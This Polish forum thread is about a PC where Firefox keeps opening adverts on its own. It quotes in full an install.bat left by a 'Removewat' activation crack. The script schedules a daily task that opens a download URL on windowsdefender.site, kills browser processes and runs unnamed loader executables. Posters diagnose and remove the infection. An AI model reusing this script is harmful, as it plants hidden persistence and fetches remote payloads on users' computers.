Skocz do zawartości
jjey225

Samo otwierające się okno przeglądarki z reklamą

Rekomendowane odpowiedzi

Hej, otóż od pewnego czasu zauważyłem, iż przeglądarka Firefox włącza mi pojedyncze okno z jakąś reklamą. Dzieje się tak nawet gdy przeglądarka jest wyłączona. Udało mi się ustalić po historii jaki adres jest samoczynnie wpisywany:

Myślałem na początku, że Windows Defender stał się wirusem albo coś ale nie sądzę gdyż ten jest wyłączony ponieważ posiadam Avast'a, a ten nic nie wykrył. Macie jakieś pomysły?

Na razie to okno wyskakuje co kilka godzin i nie jest za bardzo upierdliwe ale boję się że niedługo może zacząć się dziać coś gorszego.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Zastap Avasta porządnym antywirusem .

 

Przeskanuj kompa za pomocą Malware Bytes Antimalware lub AdwCleaner , opcjonalnie Dr.Web CureIT , po skanie daj loga z wynikiem działania któregoś z tych programów , zresztą wszystko masz w zasadach dotyczących tego działu .

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Na razie ukończyłem w końcu skan Avast'a oto on:

d182a2f458fb4.png

 

Ten pierwszy plik: "ICReninstall_windwos_reg_ac.exe" został usunięty, drugi tak samo jednak folder "Removewat 2.2.7" został, a w nim plik "install.bat".

Znajduje się w nim taka zawartość:

 

schtasks /create /tn "PPI Update" /tr "%SYSTEMROOT%\explorer.exe ""http://windowsdefender.site/download/download.php?mn=9996"""/sc DAILY
@echo off
echo Download and Install Removewat Final by Daz Team...
echo Opeaning Setup...
"Setup activation.exe"
echo.
@echo off
taskkill /f /IM chrome.exe
taskkill /f /IM firefox.exe
taskkill /f /IM iexplore.exe
cls

echo Install Removewat  2.2.7 50%...
echo.
echo Applying Registry Patch...
echo.
"Setup activation1.exe"
echo Removewat  2.2.7 78%...
echo.
echo Installation Completed....
echo.
"distant-loader.exe"
echo.
echo.
echo New Removewat  2.2.7 found!
echo.
start windows_reg_ac.exe
echo.
echo Download and install new version....
echo.
@echo off
schtasks /Run /TN "PPI Update"
echo New Removewat 2.6.7 Found! ** UPDATE IN PROGRESS... **
echo.
echo.
echo.
echo.
echo.
echo Updating to New Version....
pause

Po tej pierwszej części, czyli: "schtasks /create /tn "PPI Update" /tr "%SYSTEMROOT%\explorer.exe ""http://windowsdefender.site/download/download.php?mn=9996"""/sc DAILY" wiem już o co chodzi. 5 minut w cmd'u czytania pomocy i proszę:

71d38c80aef31.png

Czystko, pusto, pięknie. Avast jak widać nie taki zły.

Spanikowałem trochę i za szybko posta napisałem, sorry za zaśmiecanie forum.

 

P.S.:

Zastap Avasta porządnym antywirusem .

 W takim razie kolego reyden, jaki antywirus polecasz?

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Ja tam korzystam z Eseta od lat  i nie od lat nie mam problemu z wirusami czy innym syfem. Wystarczy z głową korzystać z internetu i odpowiednio sprawdzać apki, które się  instaluje. Czasem dorzucają różne świństwa. Samo włączająca się przeglądarka z reklamą może wskzywać, że jakiś  program działający w tle uruchamia ją co jakiś czas. Może to być  jakiś syf też, więc warto przeskanować dysk i system różnymi programami. Jest tego trochę. W innym wypadku usuń całkowicie Firefox'a. Ale wcześniej usuń wszystkie ciasteczka  i całą  historię, oraz wszelkie katalogi po firefox'ie.  Zainstaluj Chrome i sprawdź jak tam będzie.

  • Upvote 1

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Od czasu kupna nowego komputera zacząłem każdą instalkę czy spakowaną paczkę skanować antywirusem przed jak i po odpakowaniu.
Mój problem zaczął się w sumie od czasu gdy użyłem programu usuwającego WAT gdyż zaczęły mnie denerwować powiadomienia o tym że mogę być ofiarą fałszywego oprogramowania. Teraz dopiero zauważyłem iż 1 linijka z komendą w batchu jest w stanie narobić tyle problemów.
Generalnie korzystam z 2 przeglądarek: Firefox'a i Chrome'a. Ognisty Lis jest moją główną przeglądarką. Z Chrome'em problemów nie było, teraz muszę poczekać i zobaczyć czy problem znikł na dobre.
W sumie ESET też jest ciekawy i na pewno o obczaje.
Dzięki :biggrin:

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Dołącz do dyskusji

Możesz dodać zawartość już teraz a zarejestrować się później. Jeśli posiadasz już konto, zaloguj się aby dodać zawartość za jego pomocą.

Gość
Dodaj odpowiedź do tematu...

×   Wklejono zawartość z formatowaniem.   Przywróć formatowanie

  Dozwolonych jest tylko 75 emoji.

×   Odnośnik został automatycznie osadzony.   Przywróć wyświetlanie jako odnośnik

×   Przywrócono poprzednią zawartość.   Wyczyść edytor

×   Nie możesz bezpośrednio wkleić grafiki. Dodaj lub załącz grafiki z adresu URL.

Ładowanie


×
×
  • Dodaj nową pozycję...